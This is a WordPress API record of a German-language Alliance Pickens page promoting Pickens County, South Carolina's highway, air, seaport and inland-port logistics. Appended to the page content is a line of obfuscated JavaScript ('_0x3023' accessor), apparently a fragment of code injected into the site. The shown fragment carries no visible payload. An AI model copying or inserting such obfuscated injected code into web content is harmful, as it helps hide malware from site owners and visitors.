{"id":8114,"date":"2020-10-28T16:07:56","date_gmt":"2020-10-28T16:07:56","guid":{"rendered":"http:\/\/alliancepickens.com\/marktzugang\/"},"modified":"2020-12-04T20:10:59","modified_gmt":"2020-12-04T20:10:59","slug":"marktzugang","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/","title":{"rendered":"Marktzugang"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Logistik<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4944\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #03795b\">Autobahnverbindungen<\/span><\/strong><\/h4>\n<p>Pickens County.South Carolina.USA liegt auf halbem Weg zwischen Charlotte, North Carolina und Atlanta, Georgia, und bietet lokalen Unternehmen einen strategischen Standort, von dem aus sie ihre Kunden im S\u00fcdosten der USA und dar\u00fcber hinaus bedienen k\u00f6nnen.<\/p>\n<p>Das Pickens County grenzt an die I-85 und verf\u00fcgt \u00fcber 228 km landstaatliche Hauptstra\u00dfen.<\/p>\n<ul>\n<li>I-85 South to Georgia (zu I-20 und I-75) und Alabama (zu I-65)<\/li>\n<li>I-85 North nach North Carolina (zu I-77 und I-40) und Virginia (zu I-95)<\/li>\n<li>I-26 Ost bis I-20, I-77 und I-95<\/li>\n<li>I-26 East nach Charleston, SC und dem Hafen von Charleston<\/li>\n<li>I-26 West nach Charlotte, NC (bis I-40)<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4945\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-air2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #8a8a8a\">Air Service  <\/span><\/strong><\/h4>\n<p>Den internationalen Flughafen Greenville-Spartanburg (GSP) erreichen Sie nach nur 45 Fahrminuten. Der Pickens County Airport (LQK), ein Allgemeiner Flugflughafen, verf\u00fcgt \u00fcber eine Start- und Landebahn (Runway 23). Mit einem neu errichteten Terminalgeb\u00e4ude, das den Bergcharme der Blue Ridge Mountains widerspiegelt, ist dieser Flughafen perfekt f\u00fcr Gesch\u00e4fts- und Urlaubsreisen.[\/vc_column_text][vc_row_inner el_class=&#8221;airservice&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>Atlanta, Georgia \u2013 ATL \u2013 Endeavor Air, SkyWest Airlines, S\u00fcdwesten, Delta<\/li>\n<li>Charlotte (North Carolina) \u2013 CLT \u2013 Amerikanisch<\/li>\n<li>Chicago, Illinois \u2013 ORD \u2013 ExpressJet Airlines LLC, Envoy Air, American, SkyWest Airlines<\/li>\n<li>Dallas\/Fort Worth (Texas) \u2013 DFW<\/li>\n<li>Denver (Colorado) \u2013 DEN \u2013 Frontier<\/li>\n<li>Detroit, Michigan \u2013 DTW \u2013 GoJet Airlines LLC \/ United Express, Endeavor Air, SkyWest Airlines, Delta<\/li>\n<li>Fort Lauderdale (Florida) \u2013 FLL \u2013 Allegiant Air<\/li>\n<li>Houston, Texas \u2013 IAH \u2013 ExpressJet Airlines LLC, Mesa Airlines<\/li>\n<li>Miami (Florida) \u2013 MIA \u2013 Envoy Air<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<ul>\n<li>New York, New York \u2013 LGA \u2013 Endeavor Air, SkyWest Airlines<\/li>\n<li>Newark,New Jersey \u2013 EWR \u2013 ExpressJet Airlines LLC, United Express<\/li>\n<li>Philadelphia (Pennsylvania) \u2013 PHL \u2013 Amerikanisch<\/li>\n<li>San Jose ( Kalifornien \u2013 SJC \u2013 Delta, Sun Country Airlines \/ MN Airlines, Atlas Air, Amerikanisch<\/li>\n<li>Sanford, Florida \u2013 SFB \u2013 Allegiant Air<\/li>\n<li>Petersburg (Florida) \u2013 PIE \u2013 Allegiant Air<\/li>\n<li>Tampa (Florida) \u2013 TPA \u2013 Frontier<\/li>\n<li>Washington (Virginia) \u2013 DCA \u2013 Amerikanisch<\/li>\n<li>Washington, Virginia \u2013 IAD \u2013 Delta, ExpressJet Airlines LLC, United, Mesa Airlines, Amerikanisch<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-4946\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-port2-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><span style=\"color: #1d2c68\">Zugang zum Marine-Hafen<\/span><\/strong><\/h4>\n<p>Der Hafen von Charleston ist ein Tiefseehafen mit inneren Hafenkan\u00e4len, die -45 Fu\u00df aufnehmen, was ihn zum tiefsten im S\u00fcdatlantik macht. Die wirtschaftlichen Auswirkungen der H\u00e4fen von South Carolina sind betr\u00e4chtlich. Mehr als 280.000 Arbeitspl\u00e4tze und 45 Milliarden Dollar werden jedes Jahr f\u00fcr den Betrieb der H\u00e4fen zugeschrieben.[\/vc_column_text][vc_column_text el_class=&#8221;market&#8221;]<\/p>\n<h4><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-4947 size-full\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train.png\" alt=\"\" width=\"156\" height=\"156\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train.png 156w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-train-150x150.png 150w\" sizes=\"auto, (max-width: 156px) 100vw, 156px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"scports lignright wp-image-4956 size-full\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports.jpg\" alt=\"\" width=\"378\" height=\"314\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports.jpg 378w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/scports-300x249.jpg 300w\" sizes=\"auto, (max-width: 378px) 100vw, 378px\" \/><span style=\"color: #5dc9ae\">Binnenh\u00e4fen<\/span><\/strong><\/h4>\n<p>South Carolinas Inland Port Greer, etwas mehr als f\u00fcnfzig (50) Minuten vom Pickens County entfernt, ist eine innovative, intermodale Eisenbahnanlage, die die Vorteile eines K\u00fcstenterminals bietet, das viele Meilen landeinw\u00e4rts liegt. Die South Carolina Ports Authority besitzt und betreibt diese Einrichtungen, die es Frachtbesitzern erm\u00f6glichen, ihre Inlandskosten zu minimieren und gleichzeitig die Flexibilit\u00e4t und Effizienz zu erh\u00f6hen und Einsparungen bei variablen Kosten wie Container-Tages-, Chassis-Verleih und Demurrage zu realisieren. F\u00fcr Unternehmen, die an der Senkung ihres CO2-Fu\u00dfabdrucks interessiert sind, erm\u00f6glichen diese Anlagen Versendern, die CO2-Emissionen im Vergleich zu allen Lkw-Diensten um bis zu 80 % zu reduzieren.<\/p>\n<p>Timing ist alles. Ein spezieller Norfolk Southern Zug f\u00e4hrt sechs (6) Tage pro Woche und bietet \u00dcbernachtungsservice in beide Richtungen zum und vom Hafen von Charleston. Inland Port Greer bietet Ihnen beispiellose Flexibilit\u00e4t und Kontrolle mit der Verf\u00fcgbarkeit von Containern am n\u00e4chsten Tag, die f\u00fcr Hersteller mit engen Produktionslinien arbeitet.  <a href=\"http:\/\/scspa.com\/wp-content\/uploads\/inland-port-greer-qr.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Lesen Sie mehr<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Erfahren Sie mehr \u00fcber das Gesch\u00e4ftsklima<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;18&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact_directions\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistik [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Autobahnverbindungen Pickens County.South Carolina.USA liegt auf halbem Weg zwischen Charlotte, North Carolina und Atlanta, Georgia, und bietet lokalen Unternehmen einen strategischen Standort, von dem aus sie ihre Kunden im S\u00fcdosten der USA und dar\u00fcber hinaus bedienen k\u00f6nnen. Das Pickens County grenzt an die I-85 und verf\u00fcgt \u00fcber 228 km&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8354,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-8114","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Marktzugang - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Marktzugang - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistik [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Autobahnverbindungen Pickens County.South Carolina.USA liegt auf halbem Weg zwischen Charlotte, North Carolina und Atlanta, Georgia, und bietet lokalen Unternehmen einen strategischen Standort, von dem aus sie ihre Kunden im S\u00fcdosten der USA und dar\u00fcber hinaus bedienen k\u00f6nnen. Das Pickens County grenzt an die I-85 und verf\u00fcgt \u00fcber 228 km&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:10:59+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktzugang\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktzugang\\\/\",\"name\":\"Marktzugang - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktzugang\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktzugang\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\",\"datePublished\":\"2020-10-28T16:07:56+00:00\",\"dateModified\":\"2020-12-04T20:10:59+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktzugang\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktzugang\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktzugang\\\/#primaryimage\",\"url\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\",\"contentUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/icon-highway2.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktzugang\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gesch\u00e4ftsklima\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Marktzugang\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Marktzugang - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/","og_locale":"de_DE","og_type":"article","og_title":"Marktzugang - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Logistik [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text el_class=&#8221;market&#8221;] Autobahnverbindungen Pickens County.South Carolina.USA liegt auf halbem Weg zwischen Charlotte, North Carolina und Atlanta, Georgia, und bietet lokalen Unternehmen einen strategischen Standort, von dem aus sie ihre Kunden im S\u00fcdosten der USA und dar\u00fcber hinaus bedienen k\u00f6nnen. Das Pickens County grenzt an die I-85 und verf\u00fcgt \u00fcber 228 km&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:10:59+00:00","og_image":[{"url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/","url":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/","name":"Marktzugang - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/#primaryimage"},"thumbnailUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","datePublished":"2020-10-28T16:07:56+00:00","dateModified":"2020-12-04T20:10:59+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/#primaryimage","url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png","contentUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/icon-highway2.png"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktzugang\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Gesch\u00e4ftsklima","item":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/"},{"@type":"ListItem","position":3,"name":"Marktzugang"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8114","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=8114"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8114\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8354"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=8114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}